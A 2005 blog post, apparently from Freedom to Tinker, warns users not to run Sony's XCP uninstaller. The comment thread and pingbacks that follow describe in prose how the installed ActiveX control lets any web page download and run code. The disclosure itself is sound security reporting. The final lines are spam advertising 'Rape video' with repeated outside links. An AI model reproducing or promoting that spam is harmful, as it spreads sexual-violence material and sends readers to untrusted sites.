Alex Halderman and I have confirmed that Sony's Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony's Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit.
We are working furiously to nail down the details and will report our results here as soon as we can. [UPDATE (Nov. 15): We have now posted more details.]
In the meantime, we recommend strongly against downloading or running Sony's Web-based XCP uninstaller.
Kudos to Muzzy for first suggesting that such a hole might exist.
UPDATE: If you're technically sophisticated, and you have run the XCP uninstaller on your computer, you may be able to help us in our investigations. It won't take long. Please contact Alex to volunteer. Thanks.
Front page posts
I'll try to summarize this in one word... "ouch". Eagerly waiting for more info. This is equivalent of a soap opera, only for geeks. Gets more interesting as it develops. Somebody will get shot or stabbed very shortly.
Sorry for the second post.
I think that somebody who is going to be shot shorty will be First4Internet. As in many cases, Sony might not have been aware at all of the code and danger it presents.
The provider, being First4Internet, assured them everything was fine and dandy and so Sony PR people simply repeated that to the public.
If it will get to the court, I image First4Internet will get shafted every which way for liability and Sony will deny any wrong doing and blame it all on First4Internet.
This is almost certainly true with respect to any copyright infringement claims Sony may face due to the rootkit. I would be very surprised if Sony did not have First4Internet indemnify them up the wazoo against claims that any code F4I developed for Sony was infringing.
Of course, everything will depend on the nature and form of complaints against Sony. If Sony gets hit with claims having to do with consumer protection and consumer fraud, it may be difficult to lay off the liability on F4I, since they presumably provided a product to Sony's specifications.
All just speculation at this point, but very very interesting.
I think that someone made a decision, without the proper technical background to determine if the technology was safe, and that now Sony is paying the price for it. This has really hit their reputation badly, and probably hurt sales.
And as for First4Internet, I would say that their viability as a company is in question, along with the programming skills of their staff.
I don't think we've heard the last of this - who else did First4Internet sell the technology to? What other plans does Sony have for DRM - especially in regards to the PlayStation 3? What about the anti-virus companies that supposedly advised First4Internet?
Man this thing is a mess. Up till now I would have trusted Sony. Their release of a Linux adapation for the Play Station was a real coup. Now, I don't think I'd trust them as far as I could throw them (and a 50 year old man can't throw things very far).
This problem is not going away. I initially wasn't going to write about it since it seemed that it was subsiding. Then Sony came out with their half-assed statement that they would "temporarily" suspend manufacturing the malicious code and saying nothing about a recall, apology, etc. Worse were the steps that one had to go thru to get rid of the code. We wrote about it on Friday thinking that would be it. No such luck as today there appear to be more stories than last week. This is fire is building and Sony is throwing gas not water on the fire.
All-in-all, this reminds me of Watergate where the news kept getting worse and compounded by their horrible attempts to mitigate the damage. I believe is this going to start impacting the Sony brand and they will have no choice but to can Andrew Lack the CEO who BMG has been trying to oust anyway.
[...] http://www.freedom-to-tinker.com/?p=926 Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
Being a musician, another unfortunate consequence of Sony's mistake is the damage it will do to the artists whose works are on the CDs. If record sales are being hurt, then careers are being hurt too. I hope Sony has the integrity to take care of the artists who were the subject of the rootkit fiasco. However, I don't think Sony has a good reputation at the moment where integrity is concerned.
For what its worth-- I was about to take delivery on my sony Bravia $3800 TV however, I'm quite happy with the new HD Samsung i'm wathing Monday night football on now.
If Sony doesnt think it will have a univeral negative impact on their business they're crazy. This story is going well beyond the "geeks" . (no offense to my fellow geeks)
Alex: "If it will get to the court, I image First4Internet will get shafted every which way for liability and Sony will deny any wrong doing and blame it all on First4Internet."
IANAL, but I don't think this would work. I am pretty sure that as part of corporate due diligence Sony was supposed to have its experts look over the code from First4Internet. At the very least they should have checked into the general design and had a third party go through the code. It was really dumb of them to not do this. If you were working for Sony, wouldn't you have thought DRM code could cause security problems, and checked it out to guarantee it didn't?
[...] Also check Don’t use Sony’s Web-based XCP uninstaller, in Freedom to Tinker, as it exposes the user to serious security risks. [...]
You know somewhere at Sony a fellow geek who "gets it" is saying "I told you so, I freakin' told you so"
that's how it was at Intuit when the Turbo Tax DRM boot sector crap came out. We didn't know about the boot sector crap, that was all 3rd party, but we knew strong armed DRM was a bad idea.
Wouldn't it be amusing if it turned out that First4Internet had sold the software to Sony under standard software licensing agreement terms - i.e. absolutely no liability for anything? I'm not sure that's likely, given that it was probably custom software developed under some sort of real (not clickwrap) contract, but it would amusing if the "software license agreements can unilaterally claim the moon and stars and still be 100% enforceable" thing were to bite Sony.
[...] Freedom to Tinker » Blog Archive » Don’t Use Sony’s Web-based XCP Uninstaller [...]
I feel sorry for the folks who are trusting this program to do something helpful for them. At the same time, I hope that people will take this as a learning experience and come away with a better understanding of why software freedom (see http://www.gnu.org/philosophy/free-sw.html) is important, even for the non-technical computer user.
Someday, users will be encouraged to examine the underlying ethical questions that software proprietors don't want you to ask. The free software movement asks you to consider how should we treat other people when it comes to computer software. It's an interesting discussion, particularly now. Here's hoping that you'll join the discussion and choose to run more free software.
J. J. Nicholson-Owen: "I feel sorry for the folks who are trusting this program to do something helpful for them. At the same time, I hope that people will take this as a learning experience"
I wish *you* would take the responses to your former inept interventions as a learning experience and post something *relevant* to the discussion. But I'm not hopeful.
Urban terrorist: "who else did First4Internet sell the technology to?"
I don't know, Urban, but I found a listing of some of their clients:
"... it's certainly worth noting that Universal’s MCA unit, Warner Music Group, and EMI have all been customers of First4Internet, notwithstanding EMI’s claims of innocence."
http://www.boycottsony.us/?p=18
I think they undermined the power of blog media to their detriment. The sad fact for Music industry is that there is no fool-proof way to protect your music from being copied. All they can hope for is 80/20 rule, that most people will be decent enough to not copy or at least buy something else down the line.
Have you looked into these details from F4I?
Who else used this software. For distribution within the areas specified they must have had more than Sony as there single only client.
http://www.xcp-aurora.com/xcp1.aspx
How is XCP available?
XCP1 is now available through our CDR duplication partners in the UK and US. Record Labels also have the option to license the Aurora software programs and install their own multiple drive towers for mass burning in-house. Please contact us for more information about becoming a CDR duplication partner or for use of Aurora in-house.
London, UK
Santa Monica, CA, US
North Sydney, NSW, Australia
Germany
Osaka, Japan
Oxfordshire, UK
I think I'm posting some of the most relevant information here--run a free software OS and only free software on top of that. Someday a software proprietor won't let you turn off autorun. Someday a proprietary program with functionality you want will come with a backdoor, virus, or some other program you don't want. Then, assuming you learn about these problems before they adversely affect you, shallow reads on quick fixes (hold down this key as you put in the CD, change that registry setting, etc.) won't pass muster with the tech-heads and you'll be compelled to address the underlying problems at work. Hopefully you won't be left with a computer that obeys someone else's commands not yours. What's sad is that such educated and technically literate people have such a hard time seeing any ethical component to computing and reaching the conclusion that the practical benefits of software freedom (lower prices, higher security, ability to fully understand what a program does, etc.) don't come without the freedom.
[...] Sony is in trouble, and it is a blog that’s dropped it in it. “Freedom to tinker” alleges security flaws Sony’s anti-piracy software, XCP. Anyone who has intalled it, an then uninstalled it, on their computer, could be wide-open to attack by hacking and viruses, says the blog. The story has now been picked up by the Washington Post. [...]
I've cancelled my pre-order for my PS3, and although I was looking with interest at Sony's consumer-level HD cameras I'm now going to look elsewhere; like a lot of people, although I've not been directly affected by this I find Sony's behaviour throughout this whole debacle to be reprehensible. I do feel like I'm somewhat pissing against the wind -- 99% of the non-technical people I've spoken to have no idea what I'm on about both in terms of Sony's doings and what a root-kit actually is -- but such is life.
As always, of course, the only people who've suffered are the law-abiding citizens; the XCP protected albums are all available on P2P networks and are free of crappy DRM, so it's almost as if Sony are trying to encourage people to seek an illicit source for their music. Oh, well...
Don’t like the Sony rootkit? Don’t run the installer!
Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your compute...
Hey guys, I see you have been talking about the legal implications of Sony's little adventure. What about the INTERNATIONAL legal enviroment? Sony will be liable, both to CRIMINAL and CIVIL suites, all over the world. I4F is going to get it in the neck too.
Serves them right!
"J.B. Nicholson-Owens Says:
November 15th, 2005 at 2:02 am
I think I’m posting some of the most relevant information here–run a free software OS and only free software on top of that. "
Unfortunately that might not be an option for long. Here in Finland a project manager at IFPI (group representing phonographic industry) commented to a journalist that they don't see it a problem if a CD cannot in the future be played in Mac or Linux workstation at all, since those represent only a marginal number of all the computers.
So that's the attitude now folks.
For the iTunes music store... =)
[...] Edward Felton’s Freedom to Tinker blog entry entitled Don’t Use Sony’s Web-based XCP Uninstaller where he states: Alex Halderman and I have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
[...] Source: Freedom to Tinker via Boing Boing Filed in: Announcements | No Comments » [...]
[...] There are some hints there about vulnerabilities with the uninstaller listed above, a link here gives the warning to not use Sony’s uninstaller. [...]
Sony Joins the Hacker Community
Schneier on Security:
Bruce Schneier was where I first heard about this at. It has since gotten much worse. I have purposely not posted on this until things have shaken out a bit.
1. First it is discovered that sony has been installing a rootkit ...
This doesn't look like something Sony can palm off on someone else "sneaking in code" or doing something its legal department wasn't aware of. The EULA reads exactly the same way.
[...] Boing Boing points to an article on Freedom to Tinker about the web-based uninstaller that Sony provides for their rootkit-infested XCP DRM software. Apparently the uninstaller it potentially opens another exploitable backdoor in the OS. [...]
[...] Don’t Use Sony’s Web-based XCP Uninstaller [link] [...]
[...] More details about the exchange program will be posted on Sony-BMG’s website later this week. CDs with the rootkit can be identified by the text "?cp.sonybmg.com/xcp" on the reverse of the CD itself, or the text "cp.sonybmg.com/xcp" in the URL on the bottom or right side of the CD case. Those who have been infected by Sony’s malware should use caution when using Sony’s "patch." According to security researchers, the web-based install of Sony’s "patch" opens users up to an entirely different security risk, one that is even worse than the original rootkit. The consequences of the flaw are severe. It allows any web page you visit to download, install, and run any code it likes on your computer. Any web page can seize control of your computer; then it can do anything it likes. That’s about as serious as a security flaw can get. The root of the problem is a serious design flaw in Sony’s web-based uninstaller. When you first fill out Sony’s form to request a copy of the uninstaller, the request form downloads and installs a program – an ActiveX control created by the DRM vendor, First4Internet – called CodeSupport. CodeSupport remains on your system after you leave Sony’s site, and it is marked as safe for scripting, so any web page can ask CodeSupport to do things. One thing CodeSupport can be told to do is download and install code from an Internet site. Unfortunately, CodeSupport doesn’t verify that the downloaded code actually came from Sony or First4Internet. This means any web page can make CodeSupport download and install code from any URL without asking the user’s permission. [...]
Rootkit Sony coraz sławniejszy
Złośliwe oprogramowanie wytwórni SonyBMG (rootkit) staje się coraz sławniejsze. Afera zatacza coraz szersze kręgi i co chwila ujawniane są nowe, coraz pikantniejsze szczegóły. Wiadomo, że rootkit nie tylko ukrywa oprogram...
I also am appalled at the response of Sony and went thru the step of filing out the form to get some solution to the cluster F copy protection of SONY CD but I did not install the uninstaller. I don't trust company that acted unethically to provide a trustable fix. I will not buy any Sony CD's and have put all my Sony gear up for sale on Ebay. I am selling SONY DV camcorder, SONY digital camera, Sony Minidisc , SONY Monitor, and SONY notebook. I will not buy SONY if this is how they treat customers. I ordered a HP Tablet PC and a Canon Camcorder and Apple IPOD 60 gig video and Dell LCD monitor. MY former loyalty to SONY brand is DEAD.
Perhaps if more consumers voted with their dollars thye might get the message.
Eduardo: "IANAL, but I don’t think this would work. I am pretty sure that as part of corporate due diligence Sony was supposed to have its experts look over the code from First4Internet. At the very least they should have checked into the general design and had a third party go through the code. It was really dumb of them to not do this. If you were working for Sony, wouldn’t you have thought DRM code could cause security problems, and checked it out to guarantee it didn’t?"
You'd think so, but no... I had a pleasure to work for a tiny agency who was writing some code for one of the big 3 PC sellers... I'll give you a hint, it's not Dell or IBM. Anyways, being a sole developer on some of the smaller projects nobody has even asked me for the source code.
Big Corporation asks a Tiny Agency who has a genious sales person Bob who promised to deliver anything Big Corporation desires and then some more. When the final product is done and ready, big shot Bill at the Big Corporation looks over, gives a nod and off it goes.
I imagine the process is the same in most companies where "financial liability" is not part of the business.
I guess you are safer using peer to peer file sharing, than legally purchasing a Sony/BMI CD.
Wow, I just called Sony's 800 number and got through immediately. My name isn't really John Smith, but I gave them that name when they asked. It's just a service (the gal 'operator 21' told me so herself), but I'm suprised that there was not a hold time. I think more people need to call that number so Sony can't say that they haven't heard (m)any complaints.
My 2 cents (American, 1.2 cents Canadian ;) )
[...] Nice bedtime story so far. Now it turns out that Sony?s web-based XCP (rootkit) uninstaller seems to open huge, gaping security holes itself… [...]
How do you determine if XCP is installed?
[...] On this weeks show we look at the national attention for the free culture movement. Sean fails to score with Rosario Dawson. Fred checks out the Machinima festival in Queens. Plus there is more fallout for Sony’s DRM. We also ask you for commercials (iwasthere(at)fredbenenson.com). Fred compares his old music project with a Trading Spouses remix. In music news Fred shoots hipster rockers The Harlem Shakes. The unhip Bare Naked Ladies release their new album on a hip memorystick format. Then we try to watch video on an iPod Nano. And Sean cannot understand music blog aggregators. On the celebrity front Fred brings us more scientology news, Ali G gets threatened, and of course Christian Slater and Jeremy Piven news. Also we bash blogger Ultragrrrrl and starlet Lindsay Lohen. In comedy news, Arrested Developement gets canceled, House of Cosby is back from the dead, and Saturday Night Live has some publishing controversy. From the art world Fred revists a fabled Connecticut musuem and a new meaning for public domain. On the tech beat, we don’t care about the XBox360, some cool video casting, cellphones continue to drive us nuts, the mythical aluminum foil helmet, and the debut of google base. Then we see what’s more like drugs - DVDs or Video Games. Then we got back in time for the announcement of the iPod. We come back to the future to check out the eff joining forces with gawker. And we marvel at the 100 dollar laptop and a DIY iPod Stone dock. In New York news a gate floats around the city, a film on NYU suicide, plans for 2 Columbus Circle, an NYC bike crackdown, Google buys a huge loft, and sublet advice. We also speculate on the Astor place cube. Also the mayor is made of humus. Finnaly we check out Peter Braunstein news. He’s everywhere in New York City even on the subway. His dad thinks he did it. Apparently he was married. All this and more on “I Was There…” [...]
[...] On this weeks show we look at the national attention for the free culture movement. Sean fails to score with Rosario Dawson. Fred checks out the Machinima festival in Queens. Plus there is more fallout for Sony’s DRM. We also ask you for commercials (iwasthere(at)fredbenenson.com). Fred compares his old music project with a Trading Spouses remix. In music news Fred shoots hipster rockers The Harlem Shakes. The unhip Bare Naked Ladies release their new album on a hip memorystick format. Then we try to watch video on an iPod Nano. And Sean cannot understand music blog aggregators. On the celebrity front Fred brings us more scientology news, Ali G gets threatened, and of course Christian Slater and Jeremy Piven news. Also we bash blogger Ultragrrrrl and starlet Lindsay Lohen. In comedy news, Arrested Developement gets canceled, House of Cosby is back from the dead, and Saturday Night Live has some publishing controversy. From the art world Fred revists a fabled Connecticut musuem and a new meaning for public domain. On the tech beat, we don’t care about the XBox360, some cool video casting, cellphones continue to drive us nuts, the mythical aluminum foil helmet, and the debut of google base. Then we see what’s more like drugs - DVDs or Video Games. Then we got back in time for the announcement of the iPod. We come back to the future to check out the eff joining forces with gawker. And we marvel at the 100 dollar laptop and a DIY iPod Stone dock. In New York news a gate floats around the city, a film on NYU suicide, plans for 2 Columbus Circle, an NYC bike crackdown, Google buys a huge loft, and sublet advice. We also speculate on the Astor place cube. Also the mayor is made of humus. Finnaly we check out Peter Braunstein news. He’s everywhere in New York City even on the subway. His dad thinks he did it. Apparently he was married. All this and more on “I Was There…” [...]
[...] On this weeks show we look at the national attention for the free culture movement. Sean fails to score with Rosario Dawson. Fred checks out the Machinima festival in Queens. Plus there is more fallout for Sony’s DRM. We also ask you for commercials (iwasthere(at)fredbenenson.com). Fred compares his old music project with a Trading Spouses remix. In music news Fred shoots hipster rockers The Harlem Shakes. The unhip Bare Naked Ladies release their new album on a hip memorystick format. Then we try to watch video on an iPod Nano. And Sean cannot understand music blog aggregators. On the celebrity front Fred brings us more scientology news, Ali G gets threatened, and of course Christian Slater and Jeremy Piven news. Also we bash blogger Ultragrrrrl and starlet Lindsay Lohen. In comedy news, Arrested Developement gets canceled, House of Cosby is back from the dead, and Saturday Night Live has some publishing controversy. From the art world Fred revists a fabled Connecticut musuem and a new meaning for public domain. On the tech beat, we don’t care about the XBox360, some cool video casting, cellphones continue to drive us nuts, the mythical aluminum foil helmet, and the debut of google base. Then we see what’s more like drugs - DVDs or Video Games. Then we got back in time for the announcement of the iPod. We come back to the future to check out the eff joining forces with gawker. And we marvel at the 100 dollar laptop and a DIY iPod Stone dock. In New York news a gate floats around the city, a film on NYU suicide, plans for 2 Columbus Circle, an NYC bike crackdown, Google buys a huge loft, and sublet advice. We also speculate on the Astor place cube. Also the mayor is made of humus. Finnaly we check out Peter Braunstein news. He’s everywhere in New York City even on the subway. His dad thinks he did it. Apparently he was married. All this and more on “I Was There…” [...]
[...] Bruce Schneier has an excellent piece on the Sony rootkit. If you haven’t heard about this, I suggest starting with these two links and keep reading. This story gets weirder by the minute, but it is quite entertaining. The disturbing part is that the uninstaller is a case where the cure is worse than the disease - opening up a massive security hole in your system. [...]
Does anyone have a list of companies that use the first$internet software?
Boycott them all, for you own protection!
We need to get a listing of all the clients of F4I and when they started using this code.
That could be the first course of action to finding a "cure" for this...Ghastly Mistake.
Anyone got one?
[...] Today, following up on this possibility, Ed Felten and Alex Halderman announced that they have confirmed that Sony’s Web-based XCP uninstallation utility exposes users to serious security risk. Under at least some circumstances, running Sony’s Web-based uninstaller opens a huge security hole on your computer. We have a working demonstration exploit. [...]
[...] Latest news is that the cure is worse than the disease:http://www.freedom-to-tinker.com/?p=926I find following the developments in this case pretty interesting. I think that artists should have the right to protect their material, but I feel that most of the "solutions" that the big companies have tried to implement are draconian, fascist and show an incredible disrespect for their consumers, and this incident is a perfect example. [...]
[...] In an attempt to salvage the situation, Sony recently released instructions and an uninstaller for this piece of software. Seems like good news, no? It would be except Sony’s uninstaller actually exposes users to serious security risk. Fantastic. [...]
This Website contains explicit sexual material which may be offensive to some viewers.
You must be 18 years or older to enter this Website.
Rape video
[URL=http://freeforcedsex.da.cx]Rape video[/URL]
http://freeforcedsex.da.cx Rape video